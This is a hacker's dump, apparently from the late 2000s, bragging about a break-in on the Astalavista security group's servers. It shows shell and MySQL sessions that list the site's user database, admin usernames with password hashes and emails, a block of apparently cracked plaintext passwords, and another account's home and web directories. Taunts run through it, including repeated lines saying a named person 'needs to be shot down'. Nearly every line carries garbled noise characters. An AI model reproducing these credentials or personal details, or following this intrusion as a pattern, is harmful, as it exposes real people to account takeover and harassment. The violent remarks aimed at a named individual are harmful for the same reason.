<link>http://www.astalavista.com/exploits</link>2 M+ t# |6 b! ?. [/ F
<description>All availably Exploits.</description># w( g' H( v+ w6 h6 l8 v% O' b
<language>en-us</language>) ?7 c9 g! x5 F1 R: y5 `
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
6 b+ Q7 A6 u: n( i6 u( s <docs>http://blogs.law.harvard.edu/tech/rss</docs> [, G0 h5 A0 H a7 A; I
<generator>Astalavista.com</generator>9 R5 H" y7 k- ^) X0 N3 X
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
1 U5 J6 {' z4 U" F1 ]4 [ </channel>
9 z" h& w( N& I$ E</rss>’; v. @7 [$ e% _( _2 B9 b
4 d6 A- q, m- k; S if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {' |/ U0 U- N1 } N3 Q! P9 b* |
unlink (FULLPATH . ‘/feed/exploits.xml’);- o `2 [! ?9 d# V) Y
}
% x* _% x0 I9 ^5 ~
3 Y3 [! S. l2 b" E file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
% W& [" P3 K N, o8 w[snip]5 _+ R- ^# D! p; K. \1 `
$ r2 p& A) m8 H! ]8 v& Bsh-3.2$ cat exploits.sh
( n4 ~, G+ Q, `' Q! L#!/bin/sh
R! k. A$ e* h; K. W4 |. ^" J- `0 W
###########################################################
( t8 G6 ]7 }! M$ y' l' `# #
7 L" U# }+ Q: K& s: i6 P# Title: milw0rm exploits adder #
' N% F9 M7 Q7 o# Description: Add all milw0rm exploits to the #
^$ W% Y0 V2 P6 b. ]& C& o$ }, O# Astalavista.com database #
1 [' k! |& Y2 w( a, C# #
( S& `9 B! V3 y5 y3 z) T c- y1 _# Company: Astalavista Group #
; ]% C" R: g8 F' R# Author: Paulo M. Santos #
6 V$ y" L# X* n2 W( }# E-Mail: 链接标记paulo.santos@astalavista.ch #' y5 V, k# l& W3 R
# #6 |1 s) j- g$ T$ [ C) [' ^8 m' ~
###########################################################
. k3 x, | u" ]( |' y; r- |3 T, n% n- X
# path- u, W8 b7 ~, h6 A$ g
this_path=/home/com/public_html/modifications/cronjobs( [" A3 T- e8 q* W; u# m) d/ ]
: v* b+ J. @( O( G
# change directory
/ N' U( ~! T3 ycd $this_path
4 ?/ i8 I. y" r5 m: jcd tmp/
, B! B. t( G5 R& i7 ?
' l$ k2 u* c; k6 D/ ]# delete files: o& \# a& P0 g5 j
rm -rf milw0rm.tar.* &% H) x$ a6 n4 f* q5 I, {
rm -rf milw0rm/ &1 ~; g; N1 B: v7 b
! ?0 Y' h, Y9 U: ~$ W" N# wget milw0rm paket J, e: b0 k9 z* D7 V
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]4 `6 i- R; e6 L
" [; ]$ e! w3 P0 Z8 J' f
# extract milw0rm paket
u6 N" T+ G; y/ m' l2 V! Ttar -xvf milw0rm.tar.bz2
X5 |, Q2 n! P* p9 N
! |5 ?# z3 d b: T# change owner2 U/ `6 @, g @* q/ L
chown -R com .$ b/ t, a* j5 E, u2 w F/ `
chgrp -R com .: ?2 D' |8 S h0 W
# Q5 M9 h4 y" I2 {' K# execute php script, Y) }& E y* ~9 y% a' y/ I" v
cd $this_path
( d$ f( }+ O# F: E2 P! hphp -q exploits.php8 o0 P2 `- {$ d/ h8 u+ N1 F
( `& }, w0 r8 q& F4 A& F# delete files
K6 c9 ]+ x; J& orm -rf tmp/milw0rm.tar.*5 n r' J1 d- _! r
rm -rf tmp/milw0rm/
- p3 A6 R6 D: H% }% E1 }# n$ a3 G
7 T% o1 Y/ W) d a- Jsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
% P& w" ~$ |8 X/ G# n* ^% {Paulo M. Santos needs to be shot down.
# `; p; o% a% A( w, j1 v. j$ H9 e, _( `7 z& t" @
mysql -u contrexxuser2 -p) V+ E' p9 ?8 j7 X! b! B5 w' W
Enter password:1 h1 P% L$ V6 z! }/ B
Welcome to the MySQL monitor. Commands end with ; or \g.* N0 W* s9 P V7 y$ @" v
Your MySQL connection id is 261694. d: V- c& v2 h2 P
Server version: 5.0.45-community-log MySQL Community Edition (GPL)7 X3 X* B L s5 r5 V* a( Z: Y! W
9 p( \* z3 N2 b$ J
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.. B J/ X# z/ u! z6 W
8 k: F0 H) S0 U. _+ E9 u
mysql> show databases;& K" d" b9 m4 n8 u0 L
+——————–+
9 U6 {, u5 l: [6 I| Database |
% F1 {& ^, x- I* B+——————–+
' a' \4 b6 v3 h4 U4 X5 J| information_schema |* B$ R3 V9 @2 o: Y' s
| com_contrexx2 |
8 D* ?8 G1 p8 ~, S* {6 @| com_contrexx2_live |6 C p- E* |! ^
| test |
& j! i& b- p z- G W+——————–+
3 j- o4 D& i; L. f$ `7 ]) ]4 rows in set (0.00 sec)
! _. Z, N, _+ Y7 E( [/ z# {2 l( G( O( f
mysql> use com_contrexx2_live
! |8 S9 P7 s& z; BDatabase changed
1 N3 G1 e1 e1 b8 P* Xmysql> show tables;9 ?7 y( y- }, h4 U
+————————————————–+" n* k' I2 G- _- r( f l
| Tables_in_com_contrexx2_live |( j0 y8 W5 t s
+————————————————–+
2 `! Q! T9 Q# D7 `, F$ \8 s# @. Y7 B| cc_banner_counter |; f0 C8 W7 n' k9 R/ b
| cc_search_counter |
5 `3 U5 f8 w" R [7 ^' F| contrexx_access_group_dynamic_ids |5 B) U+ E* M- a, [/ @$ B" @5 l7 v
| contrexx_access_group_static_ids |8 Z7 s! j7 k$ J- t2 y- w2 D
| contrexx_access_rel_user_group |
5 Y+ @/ O4 y( }; \# _| contrexx_access_settings |
2 p: d# f2 r5 Y# b) f' t$ _| contrexx_access_user_attribute |
6 y- Z& L0 r, ?. X2 d/ j| contrexx_access_user_attribute_name |
+ j* @9 `/ p6 k| contrexx_access_user_attribute_value |
9 j: q' h* ]/ A+ B$ x! j m| contrexx_access_user_core_attribute |2 `; j( c! U7 j* z1 V. X$ e
| contrexx_access_user_groups |4 x: g2 s0 n2 ?6 Q9 s
| contrexx_access_user_mail |4 s1 | @ j1 L+ v; Q/ H- X. E
| contrexx_access_user_profile |
% J/ i8 y$ j' k$ o| contrexx_access_user_title |
8 d0 T# Z- K& d* Z$ n| contrexx_access_user_validity |
6 _" ?5 s8 U5 m/ s| contrexx_access_users |% W1 Z3 z4 B4 f+ }( m
| contrexx_backend_areas |
8 _- s$ |/ g8 n" \1 t# e8 e/ M| contrexx_backups |
& v+ g% d F# f9 G* ~| contrexx_content |
3 f! Y, j& _' ^7 w' w| contrexx_content_history |8 C: I) D/ ]8 e9 M# F- ^
| contrexx_content_logfile |$ E& E! G4 M7 P8 c8 h4 N
| contrexx_content_navigation |3 H4 t* _+ V# J% ?$ m
| contrexx_content_navigation_history |
}' b- S4 q K1 S8 R| contrexx_ids |
2 A* x q, N( Q) [% n1 @# {7 m( N" P" L| contrexx_languages |* H- t+ p1 @0 D. @0 y
| contrexx_lib_country |# Q; c) I$ K$ ~! n
| contrexx_log | B% K7 [6 h) O' d! l
| contrexx_module_alias_source |
( ~ k2 x3 p% \5 W7 i/ _ N' C7 X| contrexx_module_alias_target |
" a7 S+ F! G$ [7 G* C2 i' n| contrexx_module_block_blocks |7 d9 o2 d6 W$ `5 E: ?7 j3 \
| contrexx_module_block_rel_lang |2 Y. N% u- u- L' p& @+ q
| contrexx_module_block_rel_pages |9 q8 f; R7 h0 P' G
| contrexx_module_block_settings |
0 y+ a0 c4 n7 D7 s/ E+ b| contrexx_module_blog_categories |; j. A2 E& f; b7 [. e* J
| contrexx_module_blog_comments |# Z8 r, b" J3 J2 d7 }1 x( b
| contrexx_module_blog_message_to_category |
3 r2 g/ [4 t: @* Y6 n3 W3 q| contrexx_module_blog_messages |
8 ]: b; E F5 z5 L6 `* ^| contrexx_module_blog_messages_lang |: ~. f7 S8 K: k: h2 ]1 w; R
| contrexx_module_blog_networks |
: [9 \$ l3 j! f% Z2 ?$ y# u6 s0 I| contrexx_module_blog_networks_lang |
7 ^4 t! F$ @" Q6 w% o8 E' z| contrexx_module_blog_settings |0 X/ J" _0 h: ^" q
| contrexx_module_blog_votes |
" T. a) f. y7 y$ w5 D3 J2 w| contrexx_module_calendar |% l7 [& o8 D. k7 `+ q$ f- S
| contrexx_module_calendar_access |5 ^$ e4 {! [* w( D( I
| contrexx_module_calendar_categories |* E4 B, [4 o. k5 j+ B
| contrexx_module_calendar_form_data |
, F/ l( U# b5 S) A# h" I9 x: A| contrexx_module_calendar_form_fields |) ]& \- H6 j# r/ o$ a3 O
| contrexx_module_calendar_registrations |
# k7 y& v1 v* k3 F* ]$ D5 Z& e2 ~| contrexx_module_calendar_settings |% N8 A {7 R& ?9 j* e
| contrexx_module_calendar_style |0 D6 G0 K7 H" S j+ f4 g
| contrexx_module_contact_form |: R- D: y" ^. p. @2 Y
| contrexx_module_contact_form_data |; q r3 `- S+ n6 G1 k
| contrexx_module_contact_form_field |
/ n' p$ X1 _2 u4 `! w# T| contrexx_module_contact_settings |
! X' N' q) L2 }0 q| contrexx_module_data_categories |
' P( s% M0 C$ [# G+ n7 m6 `4 o( L3 I| contrexx_module_data_message_to_category |
( E t. Q7 k6 Y1 P: U| contrexx_module_data_messages |0 S7 W! n! P' r6 a
| contrexx_module_data_messages_lang |9 X8 H# A" u6 p( ]; u
| contrexx_module_data_placeholders |
5 Z% Y ~4 I4 K5 Z6 Y1 V5 k( I| contrexx_module_data_settings |
) i# n2 m2 [( {( v( `| contrexx_module_directory_access |6 E7 R7 b, A3 u( u0 g
| contrexx_module_directory_categories |
; H+ Y* \* P, X3 \| contrexx_module_directory_dir |% a5 n9 w4 R$ t" f& P
| contrexx_module_directory_inputfields |' |$ d2 ^: U+ b, R7 ]
| contrexx_module_directory_levels |
& s1 L n# ^9 j" j0 K| contrexx_module_directory_mail |# J' N% m( D6 m0 L
| contrexx_module_directory_rel_dir_cat |+ j- ]! s+ t$ v# C2 {
| contrexx_module_directory_rel_dir_level |
* z; ~5 ^+ X, `5 X- n: ?| contrexx_module_directory_settings |! @& B# m1 R! w `" d
| contrexx_module_directory_settings_google |
6 A$ @7 w) f& J( o| contrexx_module_directory_vote |) s* s9 r- l! n! p
| contrexx_module_docsys |# y6 r% k! P. ]( l" |
| contrexx_module_docsys_categories |$ f/ P+ K* F& U
| contrexx_module_egov_configuration |
% t5 C8 _! K3 m9 U; D| contrexx_module_egov_orders |% A. y6 Z' S( u8 M0 `' q( I, r6 B$ Q
| contrexx_module_egov_product_calendar |0 d! G. F( s" y( F9 g& i* A
| contrexx_module_egov_product_fields |& f: T6 V9 e" O% V# I* f
| contrexx_module_egov_products |0 ~( R& u; a7 E1 K! U- S& j
| contrexx_module_egov_settings |1 P' D+ C0 Y( y7 ~1 O" {3 {
| contrexx_module_exploits |
, e& B5 C R+ z9 @| contrexx_module_exploits_categories |9 N) l5 e c: h8 l
| contrexx_module_feed_category |
& I0 J) D% n: X5 h; A! v| contrexx_module_feed_news |
0 T5 Z U; d/ s7 e| contrexx_module_feed_newsml_association |
# _: N2 F+ |& Y; B9 C| contrexx_module_feed_newsml_categories |: x9 W3 Y+ z& S
| contrexx_module_feed_newsml_documents |" ^! w' J2 _9 T; z# |! Z7 O
| contrexx_module_feed_newsml_providers |
0 h+ r( w" h `7 v& b| contrexx_module_forum_access |
0 k, D6 H) X5 T1 ?# s y| contrexx_module_forum_categories |
) a f. A0 r8 W7 T" h0 L5 v( N| contrexx_module_forum_categories_lang |
}) k( p) o$ H6 r6 U3 [| contrexx_module_forum_notification |
`+ ?- B; K5 @0 N| contrexx_module_forum_postings |
& e, m$ T) o: ^( P| contrexx_module_forum_rating |
! p3 h) z( f( U. R6 N. ~| contrexx_module_forum_settings |6 V$ m# k# n s% X, M5 n8 c0 Q
| contrexx_module_forum_statistics |
! A7 F: \- E* \5 m- ?' l2 z7 V| contrexx_module_gallery_categories |
+ F- H1 \- D) S0 k) i% b+ y3 ?| contrexx_module_gallery_comments |0 C5 f: W0 @6 E% m6 |
| contrexx_module_gallery_language |
, G% L/ U: f. g. U% G( C| contrexx_module_gallery_language_pics |
3 ^' D1 r! ~; b3 M! q! ^| contrexx_module_gallery_pictures |7 `) U$ P% t9 _
| contrexx_module_gallery_settings |; G% g9 t {0 a3 t/ w
| contrexx_module_gallery_votes |
3 E1 l' A7 R* O+ E| contrexx_module_guestbook |
4 l, T( Q7 t4 a- u| contrexx_module_guestbook_settings |
' \$ v/ W% J: o/ q4 c" b| contrexx_module_livecam |
- U& B( X% h7 ?: s* \+ N7 q! ^& }. D| contrexx_module_livecam_settings |
3 ^6 q! h$ ^8 Z| contrexx_module_market |$ C) n0 f3 @# g8 o& n
| contrexx_module_market_access |
4 }. l4 v/ h* z g$ k| contrexx_module_market_categories |; {) H* I7 O( n; \3 p! S
| contrexx_module_market_mail |
3 r% s% `2 f$ z8 ^: g# W8 y| contrexx_module_market_paypal |) ]/ m7 y, J0 ~! k
| contrexx_module_market_settings |6 O0 E" W( _) W+ U) }0 {
| contrexx_module_market_spez_fields |5 O+ t0 p. O9 ]1 K
| contrexx_module_mediadir_access |1 z% m) X+ g4 N$ S9 Q
| contrexx_module_mediadir_categories |
8 z9 _' U, Q7 L9 j4 B| contrexx_module_mediadir_comments |4 g% B$ x; ~3 H# m: g0 |
| contrexx_module_mediadir_dir |; ?( a/ k3 L4 j
| contrexx_module_mediadir_inputfields |4 y( T9 r5 ?0 o2 j- s2 w
| contrexx_module_mediadir_levels |
" d' A1 r4 Q. {/ J| contrexx_module_mediadir_mail |
- _9 W2 U& m6 @' o5 K| contrexx_module_mediadir_rel_dir_cat |
1 B. V! g5 P8 Z& b- o$ J3 y| contrexx_module_mediadir_rel_dir_level |
- X) c+ y( \; ]9 L| contrexx_module_mediadir_reports |
7 z' @; I. X: z& w. P, Z- d! ~| contrexx_module_mediadir_settings |- f6 P# L5 s/ M# M' O( [$ E
| contrexx_module_mediadir_settings_google |
5 w, x" |% P0 X| contrexx_module_mediadir_vote |1 W/ ^. L9 {2 L6 j
| contrexx_module_memberdir_directories |
2 F" Z; Y+ Y- Z$ l( {* X/ C7 f' H; K| contrexx_module_memberdir_name |
1 M$ b. q p- Y& L1 E$ ?! M! Y| contrexx_module_memberdir_settings |
4 o: N* V) I- m2 x| contrexx_module_memberdir_values |7 Q2 b1 [, S- g4 |1 m: P) N! O
| contrexx_module_nettools_allowed_groups |
! Y: o. F% p/ \: b y| contrexx_module_nettools_settings |
6 _( S, D2 C* V# e; x- `. o7 Y| contrexx_module_news |$ j2 [9 ^: g$ ^( s7 @
| contrexx_module_news_access |
# @5 W8 K+ g- W' m4 G* z| contrexx_module_news_categories |. N7 h: R1 k: T
| contrexx_module_news_settings |
2 h$ L \1 A0 c" ?1 @" M- x( `| contrexx_module_news_teaser_frame |
: \: R( t7 ^ u3 `| contrexx_module_news_teaser_frame_templates |
3 @# f- c6 j+ m. `" ~- z2 K| contrexx_module_news_ticker |
) u: u9 v& B/ y& x& c| contrexx_module_newsletter |
; v$ n2 K% G6 d| contrexx_module_newsletter_attachment |
+ L+ i; h" d- P# q| contrexx_module_newsletter_category |/ \, a+ R9 h, ]: y4 z; P
| contrexx_module_newsletter_confirm_mail |' t3 }( G. d8 q9 L) l D
| contrexx_module_newsletter_rel_cat_news |
6 i6 c% C# i2 @| contrexx_module_newsletter_rel_user_cat |
5 z# A2 u' n2 N$ v' S| contrexx_module_newsletter_settings |
/ J h' | U% S ?3 h& Y| contrexx_module_newsletter_template |
2 P- k& R. _! q8 \* l' H p| contrexx_module_newsletter_tmp_sending |2 p& _- e) A% `1 _
| contrexx_module_newsletter_user | X: s# M* q: p7 V9 P
| contrexx_module_newsletter_user_title |
, B2 M5 E# d* x; h8 I( Z& I| contrexx_module_onlinetools_defaultports |0 c* j& x: y1 N
| contrexx_module_onlinetools_defaultports_back | y( B" B, o& S1 M1 Z" M
| contrexx_module_onlinetools_geolitecity_blocks |
8 N! f- f8 C, L4 a% V| contrexx_module_onlinetools_geolitecity_country |# k: \# i/ V5 \0 s
| contrexx_module_onlinetools_geolitecity_location |+ I# a" N- n) `. p
| contrexx_module_podcast_category |
, k% U; [4 ^, D2 i3 a5 X$ a/ r" K8 m| contrexx_module_podcast_medium |
% p+ c* B9 O- t| contrexx_module_podcast_rel_category_lang |7 B. ^( n. f: |2 P. y
| contrexx_module_podcast_rel_medium_category |
( p0 Q% W4 j, C/ F7 A" _4 G| contrexx_module_podcast_settings |/ V$ L2 B9 B) {) ]
| contrexx_module_podcast_template |
/ s3 v6 a7 _3 j| contrexx_module_proxydb |5 p; k6 @: h! G* F: v8 m3 ^$ E
| contrexx_module_recommend |
) t6 v O. X; m, m5 o+ j. \| contrexx_module_repository |
4 L7 [8 c, W" X* ^# `% o| contrexx_module_securitynews_cats |
5 f* O9 T8 j& F& P1 R| contrexx_module_securitynews_feeds |8 y! H7 A& K+ `1 b% x/ j9 s
| contrexx_module_securitynews_news |2 T4 \( c- \+ Y
| contrexx_module_shop_categories |8 G4 d9 _6 z, m$ _- @7 k- Y
| contrexx_module_shop_config |
# S" ?" a0 G( W# a| contrexx_module_shop_countries |
- y" }6 M8 U$ J, K8 l2 i| contrexx_module_shop_currencies |
; u( A. l" r: \; ~. R3 b4 m$ ~| contrexx_module_shop_customers |
, |# ^- o" G5 v| contrexx_module_shop_importimg |
+ W+ G' i: }/ q6 || contrexx_module_shop_lsv |2 F2 b+ C: D4 N# J, S4 \
| contrexx_module_shop_mail |0 c% E/ s" P. w4 \" N c
| contrexx_module_shop_mail_content |" o! W. T/ p2 d+ \: P* Z3 R7 I0 E# a
| contrexx_module_shop_manufacturer |
0 V0 E7 P5 I. l& o2 X| contrexx_module_shop_order_items |
# A& P: Z! k! I1 V+ ^' {: X| contrexx_module_shop_order_items_attributes |9 `& A ` f5 _) p- [
| contrexx_module_shop_orders |
0 v0 g" E' i; ] ^4 `& Z W; } ?| contrexx_module_shop_payment |; V2 X( e$ M( x( N2 H
| contrexx_module_shop_payment_processors |1 t- u/ `# t+ }4 [% Z0 {
| contrexx_module_shop_pricelists |
2 e% B% k w9 o1 ^) }| contrexx_module_shop_products |
$ }0 I2 J$ @; w$ p0 e% L| contrexx_module_shop_products_attributes |& G$ o# x) @& N" M5 G
| contrexx_module_shop_products_attributes_name |
$ y+ n+ r1 a% o; ]3 N, B| contrexx_module_shop_products_attributes_value |
: z, ~( k' Y8 C; L$ k+ N8 O) j| contrexx_module_shop_products_downloads |
! A: U, z! J% |4 \+ ]| contrexx_module_shop_rel_countries |
0 |) L/ y7 |$ \3 a; W| contrexx_module_shop_rel_payment |! U" @9 k) u5 _" d! @/ a
| contrexx_module_shop_rel_shipment |9 c! b- z6 c* N4 m; B- {
| contrexx_module_shop_shipment_cost |
/ f! }9 a3 I, j. Q& U| contrexx_module_shop_shipper |$ u. S9 o* v& X( x% ]
| contrexx_module_shop_vat |% D* F! ?6 R% l
| contrexx_module_shop_zones |
- [7 V7 ^0 L0 c' f5 x| contrexx_module_u2u_address_list |
3 C- m& @' h, S. _% L9 R& E, K| contrexx_module_u2u_message_log |
a/ U$ R* P7 g| contrexx_module_u2u_sent_messages |
* v/ F: u& W' X6 k5 ^; h| contrexx_module_u2u_settings |
# r' a, }2 ]6 u- ~7 o, y8 q| contrexx_module_u2u_user_log |
& p) Q/ J* `/ X| contrexx_modules |
, U r2 j0 V: p2 h| contrexx_sessions |' v4 S9 u) X/ ^, b' i' g
| contrexx_settings |7 j: p' L9 O3 y7 t% R/ n
| contrexx_settings_smtp |
6 }- S" M+ g# L/ @) {| contrexx_skins | e: W: H# j5 k4 }" n3 F
| contrexx_stats_browser |
5 Q+ r6 L% K0 O) z) C| contrexx_stats_colourdepth |
* W) r; Z* ?# U ]6 v* d| contrexx_stats_config |3 A' L7 g# t% ^
| contrexx_stats_country |# s7 X) [* _# Q* I6 D
| contrexx_stats_hostname |+ v. \& W# l3 X- g+ _
| contrexx_stats_javascript |
, v6 O! Y' H4 }: k! ?$ ~| contrexx_stats_operatingsystem |1 p" q' z! w# S& v. `$ f
| contrexx_stats_referer |* ~9 ~6 O5 n$ o5 p
| contrexx_stats_requests |
6 P" ?: j# U( j$ V1 h2 P3 e( o! J| contrexx_stats_requests_summary |
& R3 l6 h, ^. j6 F| contrexx_stats_screenresolution |
6 _, K: Z4 e; E2 ~+ A3 L| contrexx_stats_search |) [$ K5 x9 Z; U9 Y6 G
| contrexx_stats_spiders |
8 n& v/ X& S& E# g J! {5 R| contrexx_stats_spiders_summary |" _/ Z0 E$ ]- i
| contrexx_stats_visitors |
4 {- l# u- e3 c& ?. u| contrexx_stats_visitors_summary |
2 M O" n1 D) @* k9 Q i| contrexx_voting_additionaldata |- O/ n$ D5 n$ ?$ c
| contrexx_voting_email |4 [" z5 U' Q4 j
| contrexx_voting_rel_email_system |7 |/ b: T' E3 z2 [% X: D
| contrexx_voting_results |
1 a; U- o7 j( {7 C% U" R2 w/ z| contrexx_voting_system |$ o3 R+ o, }8 ^- p; ]; R
| foo |
6 B% t1 \( Z1 d7 ^6 N$ s* K3 _+————————————————–+$ l$ c$ L, {, ~5 W8 q' U
227 rows in set (0.01 sec)4 J4 i. ]5 L( z3 T
+ z3 C) K% p0 i# X! w& dmysql> select count(*) as skids from contrexx_access_users;2 b9 r( `# u6 R( c9 i( K( i
+——-+
, {0 W4 Q! A- [( {* C7 u& R) b| skids |9 b8 S3 m, z+ P' q F* r* j, F
+——-+
5 `& V. p' j9 G+ E6 z| 53699 |
6 q6 @5 @5 `: W( Y+——-+
7 j, O/ K. ^5 k3 z$ ?2 F1 row in set (0.00 sec)
1 R7 w! X; b8 d1 B
- k0 _! ^$ b" L( i/ Zmysql> describe contrexx_access_users;
( d3 Y- {& r; @, H. z+——————+——————————————+——+—–+————–+—————-+: L4 b* k. k! L5 P' w3 Y6 [
| Field | Type | Null | Key | Default | Extra |
* }) h& I5 g- n! A1 H5 e* i# W8 X+——————+——————————————+——+—–+————–+—————-+
" h. B9 {# o; Q2 p) T! H| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
5 D5 E/ ~" q; A0 Y i0 y* v- \; _ u: L| is_admin | tinyint(1) unsigned | NO | | 0 | |
3 j% y. M: T0 X5 a: J3 ~3 `7 ?0 _0 z% a6 d| username | varchar(40) | YES | MUL | NULL | |
( c4 }0 [& h+ r y| password | varchar(32) | YES | | NULL | |2 M& e2 V3 P% ~2 V& |' |
| regdate | int(14) unsigned | NO | | 0 | |
n+ O# @. V" I1 d; x| expiration | int(14) unsigned | NO | | 0 | |
0 W. I4 `) V+ \& O) ]1 W| validity | int(10) unsigned | NO | | 0 | |
/ h) j9 \& H1 J t s# L; E| last_auth | int(14) unsigned | NO | | 0 | |& W8 q- A% f; l: g) [* k
| last_activity | int(14) unsigned | NO | | 0 | |3 A4 A: k# A& g* T" {
| email | varchar(255) | YES | | NULL | |
9 S$ u7 H" j! L& a| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
* M& V+ V' E3 g4 w* s8 h1 L| frontend_lang_id | int(2) unsigned | NO | | 0 | |
6 f0 G1 ~! ?6 w: a| backend_lang_id | int(2) unsigned | NO | | 0 | |7 [. k- l3 D& O/ M9 @( Z
| active | tinyint(1) | NO | | 0 | |
G& l1 w5 S3 b% a| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |* c, q% i8 O# _- j" q2 Q$ T- M* c
| restore_key | varchar(32) | NO | | | |
; ~( t. q a% R3 A _- i| restore_key_time | int(14) unsigned | NO | | 0 | |
^& k# ]4 d3 o0 [$ q/ w6 C| u2u_active | enum(’0′,’1′) | NO | | 1 | |/ z( c9 I& [! d& j
+——————+——————————————+——+—–+————–+—————-+
! M1 `! @: H; z( Q18 rows in set (0.00 sec)
$ J( d' S2 g" G; b6 P% d! r: e7 {3 ]" Z
mysql> select username,password,email from contrexx_access_users where is_admin = 1;) X: T! n9 k( w! n+ B5 F, p
+————+———————————-+—————————–+" U& x, z$ i$ g! q* M2 W2 }6 G
| username | password | email |! z8 H, f" X& t' {
+————+———————————-+—————————–+; [# H( U0 K! i, w# U1 _
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
. V. Z6 F" j8 l0 Q8 G2 r| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
& X, H9 y# j6 X| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |' v4 s' x* j; P3 {
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
( A% ~9 h |% i! v9 U6 s+————+———————————-+—————————–+
" u9 M' V- v; R# \% t4 rows in set (0.04 sec)
2 }' e" l1 o1 ~9 [+ S! W* W( Z
: ?; n7 \$ j7 l5 k) [. Gmysql> exit;4 Y+ w: L4 m7 h' M' ?
Bye
) Q6 `; T+ Z6 F4 G" e$ \4 g+ u6 A# W1 _2 w" H2 R, `
[~] There you go, your “team of security and IT professionals” is a joke.9 ]( [) A, \8 f6 H: ]; J" E
8 p9 S( e7 b9 \; n m2 C G+——————————+
$ h7 b6 h* k4 W' m; Psystem:f82BN3+_*9 n* A8 p- D# h+ X! [8 T
Be1er0ph0r:belerophor4astacom$ B( P- y& [3 Y5 I2 Z+ ^
prozac:asta4cms!/ Q% z2 @" _0 }- ]1 N2 {, }: c3 U
commander:mpbdaagf6m
8 L" W1 h: B5 X7 ysykadul:ak29eral4 l0 |" f1 o8 y4 t5 w
+——————————+
5 t0 N# I1 K7 s. F D% R' p( m% x1 ~" P: F# E9 H+ o
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
0 ?& ~; Z# q! S" o) c4 ]$ }7 c…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.7 L& a/ _; |( ^9 ~' d# e
8 y' C5 A. O' e& c[~] Lets move to astalavista.net now,
9 e7 C% ?: r6 {7 \5 }
$ k% v6 Z1 p8 V8 {- lFrom <链接标记[url]https://www.astalavista.net/[/url]>:% {4 o" w; A9 b- G2 z
>> Everyone knows that the best defense is a good offense.
5 f, W. L: x6 F% J9 N% i$ ?1 B/ }1 N>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
, j1 `' k5 G: L; G' T+ M>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.; v5 X5 s I1 e2 n0 G# f- ~3 z. r
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
5 l* L# j" [: ~" M8 c9 Y( ~% L/ B6 T& M6 x! Q l# f" ]1 Q$ w
>> Go ahead, try and hack our server . in a completely legal way!" a W: E) q8 Z+ x- g$ O5 @
>> Learn by doing: We offer our members tricky tasks and challenges on an8 h1 Q3 l% c) |8 [
>> ongoing basis so you can test your knowledge and abilities. You can also( }" [3 x [+ x; D2 f
>> demonstrate what you.ve mastered by taking part in regular hacker contests6 o: m* U8 v" I9 m* w- }" E/ r
>> and war games
' m, P) `- J0 D1 B4 x0 L- J1 U- v s8 U
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
! }9 |* R. y% K" \& q# _3 K9 P$ j) w- D
[-] Tricky task: Find home dir of astalavista.net* j0 ^: s* c0 Z
2 }) C( |7 L$ v; _
sh-3.2$ ls -la ~astanet# e9 ~8 j' ~, X2 V
total 48
3 H4 C6 G4 C- \9 A m8 }8 Bdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 ., W: `" l9 f+ o* v( H
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..- B" j8 a* [7 s' M) P
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth* ^7 o, |; g( X% i
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history) A5 ]5 S* u! w
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
- V+ x" t4 M1 p- j1 B: L/ q$ m-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile/ `# n; c0 N7 U* w' @
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
- e1 e5 ^! B: t1 s Ddrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
0 Q9 C O H3 H! A1 k$ G' v1 \drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
5 h" u; ` Q9 c5 |drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail; | b7 r# R6 }% z0 i- d& Z
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html2 M9 u. A" i2 f0 S% u$ m" P
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow1 B% _. ~" @# W0 m9 h; S6 s
$ @. l1 R/ v/ W4 I w( L" b$ m/ t
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
. K3 A" ]3 j T9 j) j4 }sh-3.2$ ls -la
) N# ~5 h1 ?' H, P4 ~4 @) }2 Dtotal 200
, `" U9 G! {2 ndrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .3 r2 L, I7 E9 O
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..* i) U, `; ^! q1 n. V7 X9 ?2 C# j
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007& F$ ~! i( j) R) G/ L8 Q2 C+ c
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
6 x3 T+ A5 M% I: Y. O, udrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com4 H Q% O4 n0 E1 m
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
